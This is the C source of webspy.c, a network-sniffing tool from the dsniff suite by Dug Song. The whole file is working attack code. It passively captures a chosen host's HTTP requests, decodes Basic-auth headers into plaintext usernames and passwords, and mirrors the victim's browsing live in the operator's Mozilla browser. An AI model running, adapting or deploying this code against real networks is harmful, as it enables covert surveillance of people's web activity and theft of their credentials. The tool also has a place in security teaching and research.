/*
  webspy.c

  Sniff a user's web session, follow it real-time in our browser.
  
  Copyright (c) 1999 Dug Song <dugsong@monkey.org>

  $Id: webspy.c,v 1.23 2000/06/14 06:10:00 dugsong Exp $
*/

#include "config.h"

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#ifdef HAVE_ERR_H
#include <err.h>
#endif
#include <X11/Xlib.h>
#include <libnet.h>
#include <nids.h>
#include "base64.h"
#include "version.h"

/* for jwz's remote.c. */
extern int mozilla_remote_commands (Display *, Window, char **);
char	*expected_mozilla_version = "4.7";
char	*progname = "webspy";

/* Globals. */
Display		*dpy;
char		 cmd[2048], *cmdtab[2];
in_addr_t	 host;

void
usage(void)
{
	fprintf(stderr, "Version: " VERSION "\n"
		"Usage: %s [-i interface] host\n", progname);
	exit(1);
}

/* Locate substring in a binary string. */
u_char *
bufbuf(u_char *big, int blen, u_char *little, int llen)
{
	u_char *p;
	
	for (p = big; p <= big + blen - llen; p++) {
		if (memcmp(p, little, llen) == 0)
			return (p);
	}
	return (NULL);
}

int
is_display_url(char *url)
{
	int len, slen;
	char **pp, *p;
	static char *good_prefixes[] = { NULL };
	static char *good_suffixes[] = { ".html", ".htm", "/", ".shtml",
					 ".cgi", ".asp", ".php3", ".txt",
					 ".xml", ".asc", NULL };
	
	/* Get URI */
	if (strncasecmp(url, "http://", 7) == 0) {
		if ((p = strchr(url + 7, '/')) != NULL)
			url = p;
	}
	/* Get URI length, without QUERY_INFO */
	if ((p = strchr(url, '?')) != NULL)
		len = p - url;
	else
		len = strlen(url);
	
	for (pp = good_suffixes; *pp != NULL; pp++) {
		if (len < (slen = strlen(*pp))) continue;
		if (strncasecmp(&url[len - slen], *pp, slen) == 0)
			return (1);
	}
	for (pp = good_prefixes; *pp != NULL; pp++) {
		if (len < (slen = strlen(*pp))) continue;
		if (strncasecmp(url, *pp, slen) == 0)
			return (1);
	}
	return (0);
}

/*
  XXX - we should really be sniffing (and HTML-parsing) the returned
  pages, not just the request URLs. this is why we don't handle
  frames, some CGIs, banner ads, etc. correctly.
*/
int
process_http_request(struct tuple4 *addr, u_char *buf, int len)
{
	char *p, *s, *e, *uri, *vhost, *auth;
	int i, discard = 0;
	
	/* Process requests. */
	for (s = buf; (e = bufbuf(s, len, "\r\n\r\n", 4)) != NULL; s = e + 4) {
		i = (e + 4) - s;
		discard += i; len -= i;
		*e = '\0';
		
		uri = vhost = auth = NULL;
		
		/* Parse header. */
		for (p = strtok(buf, "\r\n"); p; p = strtok(NULL, "\r\n")) {
			if (strncasecmp(p, "GET ", 4) == 0) {
				uri = p + 4;
				if (strncasecmp(uri, "http://", 7) == 0) {
					vhost = uri + 7;
					uri = strchr(vhost, '/');
					i = uri - vhost;
					memmove(p, vhost, i);
					p[i] = '\0';
					vhost = p;
				}
				if ((p = strchr(uri, ' ')) != NULL)
					*p = '\0';
				
				if (!is_display_url(uri)) {
					warnx("\tignoring: %s", uri);
					uri = NULL;
					break;
				}
			}
			else if (strncasecmp(p, "Authorization: Basic ", 21)
				 == 0) {
				p += 21;
				i = base64_pton(p, p, strlen(p));
				p[i] = '\0';
				auth = p;
			}
			else if (strncasecmp(p, "Host: ", 6) == 0)
				vhost = p + 6;
		}
		if (vhost == NULL)
			vhost = libnet_host_lookup(addr->daddr, 0);
		
		if (uri != NULL && vhost != NULL) {
			snprintf(cmd, sizeof(cmd), "openURL(http://%s%s%s%s)",
				 auth ? auth : "", auth ? "@" : "",
				 vhost, uri);
			warnx("%s", cmd);
			mozilla_remote_commands(dpy, 0, cmdtab);
		}
	}
	return (discard);
}

void
sniff_http_client(struct tcp_stream *ts, void **yoda)
{
	int i;
	
	/* Only handle HTTP client traffic. */
	if (ts->addr.saddr != host ||
	    (ts->addr.dest != 80 && ts->addr.dest != 3128 &&
	     ts->addr.dest != 8080))
		return;
	
	switch (ts->nids_state) {
	case NIDS_JUST_EST:
		/* Collect data. */
		ts->server.collect = 1;
		
	case NIDS_DATA:
		if (ts->server.count_new != 0) {
			i = process_http_request(&ts->addr, ts->server.data,
						 ts->server.count -
						 ts->server.offset);
			nids_discard(ts, i);
		}
		break;
		
	default:
		if (ts->server.count != 0) {
			process_http_request(&ts->addr, ts->server.data,
					     ts->server.count -
					     ts->server.offset);
		}
		break;
	}
}

void
null_syslog(int type, int errnum, struct ip *iph, void *data)
{
}

int
main(int argc, char *argv[])
{
	int c;
	
	while ((c = getopt(argc, argv, "i:h?V")) != -1) {
		switch (c) {
		case 'i':
			nids_params.device = optarg;
			break;
		default:
			usage();
		}
	}
	argc -= optind;
	argv += optind;
	
	if (argc != 1)
		usage();
	
	cmdtab[0] = cmd;
	cmdtab[1] = NULL;
	
	if ((host = libnet_name_resolve(argv[0], 1)) == -1)
		errx(1, "unknown host");
	
	if ((dpy = XOpenDisplay(NULL)) == NULL)
		errx(1, "connection to local X server failed!");
	
	nids_params.scan_num_hosts = 0;
	nids_params.syslog = null_syslog;
	
	if (!nids_init())
		errx(1, "%s", nids_errbuf);
	
	nids_register_tcp(sniff_http_client);

	warnx("listening on %s", nids_params.device);
	nids_run();
	
	/* NOTREACHED */
	
	exit(0);
}

/* 5000. */
